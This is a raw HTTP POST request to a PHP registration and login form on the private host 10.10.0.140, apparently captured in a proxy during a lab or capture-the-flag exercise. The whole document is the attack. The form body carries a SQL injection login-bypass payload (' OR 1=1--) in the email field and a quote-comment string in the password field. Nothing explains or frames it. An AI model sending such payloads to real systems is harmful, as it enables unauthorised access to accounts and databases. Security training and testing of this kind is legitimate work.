POST /register.php HTTP/1.1

Host: 10.10.0.140

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 76

Origin: http://10.10.0.140

Connection: close

Referer: http://10.10.0.140/register.php

Cookie: PHPSESSID=n1jps4nt4q2410oou0mbnud83c

Upgrade-Insecure-Requests: 1

Pragma: no-cache

Cache-Control: no-cache



log_email=mike@mike.fr'+OR+1%3d1--&log_password=ftgh%27--&login_button=Login
